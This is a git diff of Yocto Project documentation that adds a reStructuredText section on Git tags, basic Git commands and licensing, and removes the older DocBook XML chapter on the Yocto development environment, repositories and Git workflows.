+Yocto Project Release.
+
+Git uses "tags" to mark specific changes in a repository branch
+structure. Typically, a tag is used to mark a special point such as the
+final change (or commit) before a project is released. You can see the
+tags used with the ``poky`` Git repository by going to
+:yocto_git:`/cgit.cgi/poky/` and clicking on the ``[...]`` link
+beneath the "Tag" heading.
+
+Some key tags for the ``poky`` repository are ``jethro-14.0.3``,
+``morty-16.0.1``, ``pyro-17.0.0``, and
+``&DISTRO_NAME_NO_CAP;-&POKYVERSION;``. These tags represent Yocto Project
+releases.
+
+When you create a local copy of the Git repository, you also have access
+to all the tags in the upstream repository. Similar to branches, you can
+create and checkout a local working Git branch based on a tag name. When
+you do this, you get a snapshot of the Git repository that reflects the
+state of the files when the change was made associated with that tag.
+The most common use is to checkout a working branch that matches a
+specific Yocto Project release. Here is an example:
+::
+
+   $ cd ~
+   $ git clone git://git.yoctoproject.org/poky
+   $ cd poky
+   $ git fetch --tags
+   $ git checkout tags/rocko-18.0.0 -b my_rocko-18.0.0
+
+In this example, the name
+of the top-level directory of your local Yocto Project repository is
+``poky``. After moving to the ``poky`` directory, the ``git fetch``
+command makes all the upstream tags available locally in your
+repository. Finally, the ``git checkout`` command creates and checks out
+a branch named "my-rocko-18.0.0" that is based on the upstream branch
+whose "HEAD" matches the commit in the repository associated with the
+"rocko-18.0.0" tag. The files in your repository now exactly match that
+particular Yocto Project release as it is tagged in the upstream Git
+repository. It is important to understand that when you create and
+checkout a local working branch based on a tag, your environment matches
+a specific point in time and not the entire development branch (i.e.
+from the "tip" of the branch backwards).
+
+Basic Commands
+--------------
+
+Git has an extensive set of commands that lets you manage changes and
+perform collaboration over the life of a project. Conveniently though,
+you can manage with a small set of basic operations and workflows once
+you understand the basic philosophy behind Git. You do not have to be an
+expert in Git to be functional. A good place to look for instruction on
+a minimal set of Git commands is
+`here <http://git-scm.com/documentation>`__.
+
+The following list of Git commands briefly describes some basic Git
+operations as a way to get started. As with any set of commands, this
+list (in most cases) simply shows the base command and omits the many
+arguments it supports. See the Git documentation for complete
+descriptions and strategies on how to use these commands:
+
+-  *git init:* Initializes an empty Git repository. You cannot use
+   Git commands unless you have a ``.git`` repository.
+
+-  *git clone:* Creates a local clone of a Git repository that is on
+   equal footing with a fellow developer's Git repository or an upstream
+   repository.
+
+-  *git add:* Locally stages updated file contents to the index that
+   Git uses to track changes. You must stage all files that have changed
+   before you can commit them.
+
+-  *git commit:* Creates a local "commit" that documents the changes
+   you made. Only changes that have been staged can be committed.
+   Commits are used for historical purposes, for determining if a
+   maintainer of a project will allow the change, and for ultimately
+   pushing the change from your local Git repository into the project's
+   upstream repository.
+
+-  *git status:* Reports any modified files that possibly need to be
+   staged and gives you a status of where you stand regarding local
+   commits as compared to the upstream repository.
+
+-  *git checkout branch-name:* Changes your local working branch and
+   in this form assumes the local branch already exists. This command is
+   analogous to "cd".
+
+-  *git checkout –b working-branch upstream-branch:* Creates and
+   checks out a working branch on your local machine. The local branch
+   tracks the upstream branch. You can use your local branch to isolate
+   your work. It is a good idea to use local branches when adding
+   specific features or changes. Using isolated branches facilitates
+   easy removal of changes if they do not work out.
+
+-  *git branch:* Displays the existing local branches associated
+   with your local repository. The branch that you have currently
+   checked out is noted with an asterisk character.
+
+-  *git branch -D branch-name:* Deletes an existing local branch.
+   You need to be in a local branch other than the one you are deleting
+   in order to delete branch-name.
+
+-  *git pull --rebase:* Retrieves information from an upstream Git
+   repository and places it in your local Git repository. You use this
+   command to make sure you are synchronized with the repository from
+   which you are basing changes (.e.g. the "master" branch). The
+   "--rebase" option ensures that any local commits you have in your
+   branch are preserved at the top of your local branch.
+
+-  *git push repo-name local-branch:upstream-branch:* Sends
+   all your committed local changes to the upstream Git repository that
+   your local repository is tracking (e.g. a contribution repository).
+   The maintainer of the project draws from these repositories to merge
+   changes (commits) into the appropriate branch of project's upstream
+   repository.
+
+-  *git merge:* Combines or adds changes from one local branch of
+   your repository with another branch. When you create a local Git
+   repository, the default branch is named "master". A typical workflow
+   is to create a temporary branch that is based off "master" that you
+   would use for isolated work. You would make your changes in that
+   isolated branch, stage and commit them locally, switch to the
+   "master" branch, and then use the ``git merge`` command to apply the
+   changes from your isolated branch into the currently checked out
+   branch (e.g. "master"). After the merge is complete and if you are
+   done with working in that isolated branch, you can safely delete the
+   isolated branch.
+
+-  *git cherry-pick commits:* Choose and apply specific commits from
+   one branch into another branch. There are times when you might not be
+   able to merge all the changes in one branch with another but need to
+   pick out certain ones.
+
+-  *gitk:* Provides a GUI view of the branches and changes in your
+   local Git repository. This command is a good way to graphically see
+   where things have diverged in your local repository.
+
+   .. note::
+
+      You need to install the
+      gitk
+      package on your development system to use this command.
+
+-  *git log:* Reports a history of your commits to the repository.
+   This report lists all commits regardless of whether you have pushed
+   them upstream or not.
+
+-  *git diff:* Displays line-by-line differences between a local
+   working file and the same file as understood by Git. This command is
+   useful to see what you have changed in any given file.
+
+Licensing
+=========
+
+Because open source projects are open to the public, they have different
+licensing structures in place. License evolution for both Open Source
+and Free Software has an interesting history. If you are interested in
+this history, you can find basic information here:
+
+-  `Open source license
+   history <http://en.wikipedia.org/wiki/Open-source_license>`__
+
+-  `Free software license
+   history <http://en.wikipedia.org/wiki/Free_software_license>`__
+
+In general, the Yocto Project is broadly licensed under the
+Massachusetts Institute of Technology (MIT) License. MIT licensing
+permits the reuse of software within proprietary software as long as the
+license is distributed with that software. MIT is also compatible with
+the GNU General Public License (GPL). Patches to the Yocto Project
+follow the upstream licensing scheme. You can find information on the
+MIT license
+`here <http://www.opensource.org/licenses/mit-license.php>`__. You can
+find information on the GNU GPL
+`here <http://www.opensource.org/licenses/LGPL-3.0>`__.
+
+When you build an image using the Yocto Project, the build process uses
+a known list of licenses to ensure compliance. You can find this list in
+the :term:`Source Directory` at
+``meta/files/common-licenses``. Once the build completes, the list of
+all licenses found and used during that build are kept in the
+:term:`Build Directory` at
+``tmp/deploy/licenses``.
+
+If a module requires a license that is not in the base list, the build
+process generates a warning during the build. These tools make it easier
+for a developer to be certain of the licenses with which their shipped
+products must comply. However, even with these tools it is still up to
+the developer to resolve potential licensing issues.
+
+The base list of licenses used by the build process is a combination of
+the Software Package Data Exchange (SPDX) list and the Open Source
+Initiative (OSI) projects. `SPDX Group <http://spdx.org>`__ is a working
+group of the Linux Foundation that maintains a specification for a
+standard format for communicating the components, licenses, and
+copyrights associated with a software package.
+`OSI <http://opensource.org>`__ is a corporation dedicated to the Open
+Source Definition and the effort for reviewing and approving licenses
+that conform to the Open Source Definition (OSD).
+
+You can find a list of the combined SPDX and OSI licenses that the Yocto
+Project uses in the ``meta/files/common-licenses`` directory in your
+:term:`Source Directory`.
+
+For information that can help you maintain compliance with various open
+source licensing during the lifecycle of a product created using the
+Yocto Project, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual.
diff --git a/documentation/overview-manual/overview-manual-development-environment.xml b/documentation/overview-manual/overview-manual-development-environment.xml
deleted file mode 100644
index 36ebf8a321..0000000000
--- a/documentation/overview-manual/overview-manual-development-environment.xml
+++ /dev/null
@@ -1,953 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='overview-development-environment'>
-<title>The Yocto Project Development Environment</title>
-
-<para>
-    This chapter takes a look at the Yocto Project development
-    environment.
-    The chapter provides Yocto Project Development environment concepts that
-    help you understand how work is accomplished in an open source environment,
-    which is very different as compared to work accomplished in a closed,
-    proprietary environment.
-</para>
-
-<para>
-    Specifically, this chapter addresses open source philosophy, source
-    repositories, workflows, Git, and licensing.
-</para>
-
-<section id='open-source-philosophy'>
-    <title>Open Source Philosophy</title>
-
-    <para>
-        Open source philosophy is characterized by software development
-        directed by peer production and collaboration through an active
-        community of developers.
-        Contrast this to the more standard centralized development models
-        used by commercial software companies where a finite set of developers
-        produces a product for sale using a defined set of procedures that
-        ultimately result in an end product whose architecture and source
-        material are closed to the public.
-    </para>
-
-    <para>
-        Open source projects conceptually have differing concurrent agendas,
-        approaches, and production.
-        These facets of the development process can come from anyone in the
-        public (community) who has a stake in the software project.
-        The open source environment contains new copyright, licensing, domain,
-        and consumer issues that differ from the more traditional development
-        environment.
-        In an open source environment, the end product, source material,
-        and documentation are all available to the public at no cost.
-    </para>
-
-    <para>
-        A benchmark example of an open source project is the Linux kernel,
-        which was initially conceived and created by Finnish computer science
-        student Linus Torvalds in 1991.
-        Conversely, a good example of a non-open source project is the
-        <trademark class='registered'>Windows</trademark> family of operating
-        systems developed by
-        <trademark class='registered'>Microsoft</trademark> Corporation.
-    </para>
-
-    <para>
-        Wikipedia has a good historical description of the Open Source
-        Philosophy
-        <ulink url='http://en.wikipedia.org/wiki/Open_source'>here</ulink>.
-        You can also find helpful information on how to participate in the
-        Linux Community
-        <ulink url='http://ldn.linuxfoundation.org/book/how-participate-linux-community'>here</ulink>.
-    </para>
-</section>
-
-<section id='gs-the-development-host'>
-    <title>The Development Host</title>
-
-    <para>
-        A development host or
-        <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>
-        is key to using the Yocto Project.
-        Because the goal of the Yocto Project is to develop images or
-        applications that run on embedded hardware, development of those
-        images and applications generally takes place on a system not
-        intended to run the software - the development host.
-    </para>
-
-    <para>
-        You need to set up a development host in order to use it with the
-        Yocto Project.
-        Most find that it is best to have a native Linux machine function as
-        the development host.
-        However, it is possible to use a system that does not run Linux
-        as its operating system as your development host.
-        When you have a Mac or Windows-based system, you can set it up
-        as the development host by using
-        <ulink url='https://github.com/crops/poky-container'>CROPS</ulink>,
-        which leverages
-        <ulink url='https://www.docker.com/'>Docker Containers</ulink>.
-        Once you take the steps to set up a CROPS machine, you effectively
-        have access to a shell environment that is similar to what you see
-        when using a Linux-based development host.
-        For the steps needed to set up a system using CROPS, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-to-use-crops'>Setting Up to Use CROss PlatformS (CROPS)</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-
-    <para>
-        If your development host is going to be a system that runs a Linux
-        distribution, steps still exist that you must take to prepare the
-        system for use with the Yocto Project.
-        You need to be sure that the Linux distribution on the system is
-        one that supports the Yocto Project.
-        You also need to be sure that the correct set of host packages are
-        installed that allow development using the Yocto Project.
-        For the steps needed to set up a development host that runs Linux,
-        see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-a-native-linux-host'>Setting Up a Native Linux Host</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-
-    <para>
-        Once your development host is set up to use the Yocto Project,
-        several methods exist for you to do work in the Yocto Project
-        environment:
-        <itemizedlist>
-            <listitem><para>
-                <emphasis>Command Lines, BitBake, and Shells:</emphasis>
-                Traditional development in the Yocto Project involves using the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>,
-                which uses BitBake, in a command-line environment from a shell
-                on your development host.
-                You can accomplish this from a host that is a native Linux
-                machine or from a host that has been set up with CROPS.
-                Either way, you create, modify, and build images and
-                applications all within a shell-based environment using
-                components and tools available through your Linux distribution
-                and the Yocto Project.</para>
-
-                <para>For a general flow of the build procedures, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-building-a-simple-image'>Building a Simple Image</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Board Support Package (BSP) Development:</emphasis>
-                Development of BSPs involves using the Yocto Project to
-                create and test layers that allow easy development of
-                images and applications targeted for specific hardware.
-                To development BSPs, you need to take some additional steps
-                beyond what was described in setting up a development host.
-                </para>
-
-                <para>The
-                <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>
-                provides BSP-related development information.
-                For specifics on development host preparation, see the
-                "<ulink url='&YOCTO_DOCS_BSP_URL;#preparing-your-build-host-to-work-with-bsp-layers'>Preparing Your Build Host to Work With BSP Layers</ulink>"
-                section in the Yocto Project Board Support Package (BSP)
-                Developer's Guide.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Kernel Development:</emphasis>
-                If you are going to be developing kernels using the Yocto
-                Project you likely will be using <filename>devtool</filename>.
-                A workflow using <filename>devtool</filename> makes kernel
-                development quicker by reducing iteration cycle times.</para>
-
-                <para>The
-                <ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;'>Yocto Project Linux Kernel Development Manual</ulink>
-                provides kernel-related development information.
-                For specifics on development host preparation, see the
-                "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#preparing-the-build-host-to-work-on-the-kernel'>Preparing the Build Host to Work on the Kernel</ulink>"
-                section in the Yocto Project Linux Kernel Development Manual.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Using Toaster:</emphasis>
-                The other Yocto Project development method that involves an
-                interface that effectively puts the Yocto Project into the
-                background is Toaster.
-                Toaster provides an interface to the OpenEmbedded build system.
-                The interface enables you to configure and run your builds.
-                Information about builds is collected and stored in a database.
-                You can use Toaster to configure and start builds on multiple
-                remote build servers.</para>
-
-                <para>For steps that show you how to set up your development
-                host to use Toaster and on how to use Toaster in general,
-                see the
-                <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='yocto-project-repositories'>
-    <title>Yocto Project Source Repositories</title>
-
-    <para>
-        The Yocto Project team maintains complete source repositories for all
-        Yocto Project files at
-        <ulink url='&YOCTO_GIT_URL;'></ulink>.
-        This web-based source code browser is organized into categories by
-        function such as IDE Plugins, Matchbox, Poky, Yocto Linux Kernel, and
-        so forth.
-        From the interface, you can click on any particular item in the "Name"
-        column and see the URL at the bottom of the page that you need to clone
-        a Git repository for that particular item.
-        Having a local Git repository of the
-        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>,
-        which is usually named "poky", allows
-        you to make changes, contribute to the history, and ultimately enhance
-        the Yocto Project's tools, Board Support Packages, and so forth.
-    </para>
-
-    <para>
-        For any supported release of Yocto Project, you can also go to the
-        <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink> and
-        select the "DOWNLOADS" item from the "SOFTWARE" menu and get a
-        released tarball of the <filename>poky</filename> repository, any
-        supported BSP tarball, or Yocto Project tools.
-        Unpacking these tarballs gives you a snapshot of the released
-        files.
-        <note><title>Notes</title>
-            <itemizedlist>
-                <listitem><para>
-                    The recommended method for setting up the Yocto Project
-                    <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                    and the files for supported BSPs
-                    (e.g., <filename>meta-intel</filename>) is to use
-                    <link linkend='git'>Git</link> to create a local copy of
-                    the upstream repositories.
-                    </para></listitem>
-                <listitem><para>
-                    Be sure to always work in matching branches for both
-                    the selected BSP repository and the Source Directory
-                    (i.e. <filename>poky</filename>) repository.
-                    For example, if you have checked out the "master" branch
-                    of <filename>poky</filename> and you are going to use
-                    <filename>meta-intel</filename>, be sure to checkout the
-                    "master" branch of <filename>meta-intel</filename>.
-                    </para></listitem>
-            </itemizedlist>
-        </note>
-    </para>
-
-    <para>
-        In summary, here is where you can get the project files needed for
-        development:
-        <itemizedlist>
-            <listitem><para id='source-repositories'>
-                <emphasis>
-                <ulink url='&YOCTO_GIT_URL;'>Source Repositories:</ulink>
-                </emphasis>
-                This area contains IDE Plugins, Matchbox, Poky, Poky Support,
-                Tools, Yocto Linux Kernel, and Yocto Metadata Layers.
-                You can create local copies of Git repositories for each of
-                these areas.</para>
-
-                <para>
-                <imagedata fileref="figures/source-repos.png" align="center" width="6in" depth="4in" />
-                For steps on how to view and access these upstream Git
-                repositories, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#accessing-source-repositories'>Accessing Source Repositories</ulink>"
-                Section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-            <listitem><para><anchor id='index-downloads' />
-                <emphasis>
-                <ulink url='&YOCTO_DL_URL;/releases/'>Index of /releases:</ulink>
-                </emphasis>
-                This is an index of releases such as Poky, Pseudo, installers
-                for cross-development toolchains, miscellaneous support
-                and all released versions of Yocto Project in the form of
-                images or tarballs.
-                Downloading and extracting these files does not produce a local
-                copy of the Git repository but rather a snapshot of a
-                particular release or image.</para>
-
-                <para>
-                <imagedata fileref="figures/index-downloads.png" align="center" width="6in" depth="3.5in" />
-                For steps on how to view and access these files, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#accessing-index-of-releases'>Accessing Index of Releases</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-            <listitem><para id='downloads-page'>
-                <emphasis>"DOWNLOADS" page for the
-                <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>:
-                </emphasis></para>
-
-                <para>The Yocto Project website includes a "DOWNLOADS" page
-                accessible through the "SOFTWARE" menu that allows you to
-                download any Yocto Project release, tool, and Board Support
-                Package (BSP) in tarball form.
-                The tarballs are similar to those found in the
-                <ulink url='&YOCTO_DL_URL;/releases/'>Index of /releases:</ulink>
-                area.</para>
-
-                <para>
-                <imagedata fileref="figures/yp-download.png" align="center" width="6in" depth="4in" />
-                For steps on how to use the "DOWNLOADS" page, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#using-the-downloads-page'>Using the Downloads Page</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='gs-git-workflows-and-the-yocto-project'>
-    <title>Git Workflows and the Yocto Project</title>
-
-    <para>
-        Developing using the Yocto Project likely requires the use of
-        <link linkend='git'>Git</link>.
-        Git is a free, open source distributed version control system
-        used as part of many collaborative design environments.
-        This section provides workflow concepts using the Yocto Project and
-        Git.
-        In particular, the information covers basic practices that describe
-        roles and actions in a collaborative development environment.
-        <note>
-            If you are familiar with this type of development environment, you
-            might not want to read this section.
-        </note>
-    </para>
-
-    <para>
-        The Yocto Project files are maintained using Git in "branches"
-        whose Git histories track every change and whose structures
-        provide branches for all diverging functionality.
-        Although there is no need to use Git, many open source projects do so.
-    <para>
-
-    </para>
-        For the Yocto Project, a key individual called the "maintainer" is
-        responsible for the integrity of the "master" branch of a given Git
-        repository.
-        The "master" branch is the “upstream� repository from which final or
-        most recent builds of a project occur.
-        The maintainer is responsible for accepting changes from other
-        developers and for organizing the underlying branch structure to
-        reflect release strategies and so forth.
-        <note>
-            For information on finding out who is responsible for (maintains)
-            a particular area of code in the Yocto Project, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#how-to-submit-a-change'>Submitting a Change to the Yocto Project</ulink>"
-            section of the Yocto Project Development Tasks Manual.
-        </note>
-    </para>
-
-    <para>
-        The Yocto Project <filename>poky</filename> Git repository also has an
-        upstream contribution Git repository named
-        <filename>poky-contrib</filename>.
-        You can see all the branches in this repository using the web interface
-        of the
-        <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink> organized
-        within the "Poky Support" area.
-        These branches hold changes (commits) to the project that have been
-        submitted or committed by the Yocto Project development team and by
-        community members who contribute to the project.
-        The maintainer determines if the changes are qualified to be moved
-        from the "contrib" branches into the "master" branch of the Git
-        repository.
-    </para>
-
-    <para>
-        Developers (including contributing community members) create and
-        maintain cloned repositories of upstream branches.
-        The cloned repositories are local to their development platforms and
-        are used to develop changes.
-        When a developer is satisfied with a particular feature or change,
-        they "push" the change to the appropriate "contrib" repository.
-    </para>
-
-    <para>
-        Developers are responsible for keeping their local repository
-        up-to-date with whatever upstream branch they are working against.
-        They are also responsible for straightening out any conflicts that
-        might arise within files that are being worked on simultaneously by
-        more than one person.
-        All this work is done locally on the development host before
-        anything is pushed to a "contrib" area and examined at the maintainer’s
-        level.
-    </para>
-
-    <para>
-        A somewhat formal method exists by which developers commit changes
-        and push them into the "contrib" area and subsequently request that
-        the maintainer include them into an upstream branch.
-        This process is called “submitting a patch� or "submitting a change."
-        For information on submitting patches and changes, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#how-to-submit-a-change'>Submitting a Change to the Yocto Project</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-
-    <para>
-        In summary, a single point of entry
-        exists for changes into a "master" or development branch of the
-        Git repository, which is controlled by the project’s maintainer.
-        And, a set of developers exist who independently develop, test, and
-        submit changes to "contrib" areas for the maintainer to examine.
-        The maintainer then chooses which changes are going to become a
-        permanent part of the project.
-    </para>
-
-    <para>
-        <imagedata fileref="figures/git-workflow.png" width="6in" depth="3in" align="left" scalefit="1" />
-    </para>
-
-    <para>
-        While each development environment is unique, there are some best
-        practices or methods that help development run smoothly.
-        The following list describes some of these practices.
-        For more information about Git workflows, see the workflow topics in
-        the
-        <ulink url='http://book.git-scm.com'>Git Community Book</ulink>.
-        <itemizedlist>
-            <listitem><para>
-                <emphasis>Make Small Changes:</emphasis>
-                It is best to keep the changes you commit small as compared to
-                bundling many disparate changes into a single commit.
-                This practice not only keeps things manageable but also allows
-                the maintainer to more easily include or refuse changes.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Make Complete Changes:</emphasis>
-                It is also good practice to leave the repository in a
-                state that allows you to still successfully build your project.
-                In other words, do not commit half of a feature,
-                then add the other half as a separate, later commit.
-                Each commit should take you from one buildable project state
-                to another buildable state.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Use Branches Liberally:</emphasis>
-                It is very easy to create, use, and delete local branches in
-                your working Git repository on the development host.
-                You can name these branches anything you like.
-                It is helpful to give them names associated with the particular
-                feature or change on which you are working.
-                Once you are done with a feature or change and have merged it
-                into your local master branch, simply discard the temporary
-                branch.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Merge Changes:</emphasis>
-                The <filename>git merge</filename> command allows you to take
-                the changes from one branch and fold them into another branch.
-                This process is especially helpful when more than a single
-                developer might be working on different parts of the same
-                feature.
-                Merging changes also automatically identifies any collisions
-                or "conflicts" that might happen as a result of the same lines
-                of code being altered by two different developers.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Manage Branches:</emphasis>
-                Because branches are easy to use, you should use a system
-                where branches indicate varying levels of code readiness.
-                For example, you can have a "work" branch to develop in, a
-                "test" branch where the code or change is tested, a "stage"
-                branch where changes are ready to be committed, and so forth.
-                As your project develops, you can merge code across the
-                branches to reflect ever-increasing stable states of the
-                development.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Use Push and Pull:</emphasis>
-                The push-pull workflow is based on the concept of developers
-                "pushing" local commits to a remote repository, which is
-                usually a contribution repository.
-                This workflow is also based on developers "pulling" known
-                states of the project down into their local development
-                repositories.
-                The workflow easily allows you to pull changes submitted by
-                other developers from the upstream repository into your
-                work area ensuring that you have the most recent software
-                on which to develop.
-                The Yocto Project has two scripts named
-                <filename>create-pull-request</filename> and
-                <filename>send-pull-request</filename> that ship with the
-                release to facilitate this workflow.
-                You can find these scripts in the <filename>scripts</filename>
-                folder of the
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-                For information on how to use these scripts, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#pushing-a-change-upstream'>Using Scripts to Push a Change Upstream and Request a Pull</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Patch Workflow:</emphasis>
-                This workflow allows you to notify the maintainer through an
-                email that you have a change (or patch) you would like
-                considered for the "master" branch of the Git repository.
-                To send this type of change, you format the patch and then
-                send the email using the Git commands
-                <filename>git format-patch</filename> and
-                <filename>git send-email</filename>.
-                For information on how to use these scripts, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#how-to-submit-a-change'>Submitting a Change to the Yocto Project</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='git'>
-    <title>Git</title>
-
-    <para>
-        The Yocto Project makes extensive use of Git, which is a
-        free, open source distributed version control system.
-        Git supports distributed development, non-linear development,
-        and can handle large projects.
-        It is best that you have some fundamental understanding
-        of how Git tracks projects and how to work with Git if
-        you are going to use the Yocto Project for development.
-        This section provides a quick overview of how Git works and
-        provides you with a summary of some essential Git commands.
-        <note><title>Notes</title>
-            <itemizedlist>
-                <listitem><para>
-                    For more information on Git, see
-                    <ulink url='http://git-scm.com/documentation'></ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    If you need to download Git, it is recommended that you add
-                    Git to your system through your distribution's "software
-                    store" (e.g. for Ubuntu, use the Ubuntu Software feature).
-                    For the Git download page, see
-                    <ulink url='http://git-scm.com/download'></ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    For information beyond the introductory nature in this
-                    section, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#locating-yocto-project-source-files'>Locating Yocto Project Source Files</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para></listitem>
-            </itemizedlist>
-        </note>
-    </para>
-
-    <section id='repositories-tags-and-branches'>
-        <title>Repositories, Tags, and Branches</title>
-
-        <para>
-            As mentioned briefly in the previous section and also in the
-            "<link linkend='gs-git-workflows-and-the-yocto-project'>Git Workflows and the Yocto Project</link>"
-            section, the Yocto Project maintains source repositories at
-            <ulink url='&YOCTO_GIT_URL;'></ulink>.
-            If you look at this web-interface of the repositories, each item
-            is a separate Git repository.
-        </para>
-
-        <para>
-            Git repositories use branching techniques that track content
-            change (not files) within a project (e.g. a new feature or updated
-            documentation).
-            Creating a tree-like structure based on project divergence allows
-            for excellent historical information over the life of a project.
-            This methodology also allows for an environment from which you can
-            do lots of local experimentation on projects as you develop
-            changes or new features.
-        </para>
-
-        <para>
-            A Git repository represents all development efforts for a given
-            project.
-            For example, the Git repository <filename>poky</filename> contains
-            all changes and developments for that repository over the course
-            of its entire life.
-            That means that all changes that make up all releases are captured.
-            The repository maintains a complete history of changes.
-        </para>
-
-        <para>
-            You can create a local copy of any repository by "cloning" it
-            with the <filename>git clone</filename> command.
-            When you clone a Git repository, you end up with an identical
-            copy of the repository on your development system.
-            Once you have a local copy of a repository, you can take steps to
-            develop locally.
-            For examples on how to clone Git repositories, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#locating-yocto-project-source-files'>Locating Yocto Project Source Files</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-
-        <para>
-            It is important to understand that Git tracks content change and
-            not files.
-            Git uses "branches" to organize different development efforts.
-            For example, the <filename>poky</filename> repository has
-            several branches that include the current "&DISTRO_NAME_NO_CAP;"
-            branch, the "master" branch, and many branches for past
-            Yocto Project releases.
-            You can see all the branches by going to
-            <ulink url='&YOCTO_GIT_URL;/cgit.cgi/poky/'></ulink> and
-            clicking on the
-            <filename><ulink url='&YOCTO_GIT_URL;/cgit.cgi/poky/refs/heads'>[...]</ulink></filename>
-            link beneath the "Branch" heading.
-        </para>
-
-        <para>
-            Each of these branches represents a specific area of development.
-            The "master" branch represents the current or most recent
-            development.
-            All other branches represent offshoots of the "master" branch.
-        </para>
-
-        <para>
-            When you create a local copy of a Git repository, the copy has
-            the same set of branches as the original.
-            This means you can use Git to create a local working area
-            (also called a branch) that tracks a specific development branch
-            from the upstream source Git repository.
-            in other words, you can define your local Git environment to
-            work on any development branch in the repository.
-            To help illustrate, consider the following example Git commands:
-            <literallayout class='monospaced'>
-     $ cd ~
-     $ git clone git://git.yoctoproject.org/poky
-     $ cd poky
-     $ git checkout -b &DISTRO_NAME_NO_CAP; origin/&DISTRO_NAME_NO_CAP;
-            </literallayout>
-            In the previous example after moving to the home directory, the
-            <filename>git clone</filename> command creates a
-            local copy of the upstream <filename>poky</filename> Git repository.
-            By default, Git checks out the "master" branch for your work.
-            After changing the working directory to the new local repository
-            (i.e. <filename>poky</filename>), the
-            <filename>git checkout</filename> command creates
-            and checks out a local branch named "&DISTRO_NAME_NO_CAP;", which
-            tracks the upstream "origin/&DISTRO_NAME_NO_CAP;" branch.
-            Changes you make while in this branch would ultimately affect
-            the upstream "&DISTRO_NAME_NO_CAP;" branch of the
-            <filename>poky</filename> repository.
-        </para>
-
-        <para>
-            It is important to understand that when you create and checkout a
-            local working branch based on a branch name,
-            your local environment matches the "tip" of that particular
-            development branch at the time you created your local branch,
-            which could be different from the files in the "master" branch
-            of the upstream repository.
-            In other words, creating and checking out a local branch based on
-            the "&DISTRO_NAME_NO_CAP;" branch name is not the same as
-            checking out the "master" branch in the repository.
-            Keep reading to see how you create a local snapshot of a Yocto
-            Project Release.
-        </para>
-
-        <para>
-            Git uses "tags" to mark specific changes in a repository branch
-            structure.
-            Typically, a tag is used to mark a special point such as the final
-            change (or commit) before a project is released.
-            You can see the tags used with the <filename>poky</filename> Git
-            repository by going to
-            <ulink url='&YOCTO_GIT_URL;/cgit.cgi/poky/'></ulink> and
-            clicking on the
-            <filename><ulink url='&YOCTO_GIT_URL;/cgit.cgi/poky/refs/tags'>[...]</ulink></filename>
-            link beneath the "Tag" heading.
-        </para>
-
-        <para>
-            Some key tags for the <filename>poky</filename> repository are
-            <filename>jethro-14.0.3</filename>,
-            <filename>morty-16.0.1</filename>,
-            <filename>pyro-17.0.0</filename>, and
-            <filename>&DISTRO_NAME_NO_CAP;-&POKYVERSION;</filename>.
-            These tags represent Yocto Project releases.
-        </para>
-
-        <para>
-            When you create a local copy of the Git repository, you also
-            have access to all the tags in the upstream repository.
-            Similar to branches, you can create and checkout a local working
-            Git branch based on a tag name.
-            When you do this, you get a snapshot of the Git repository that
-            reflects the state of the files when the change was made associated
-            with that tag.
-            The most common use is to checkout a working branch that matches
-            a specific Yocto Project release.
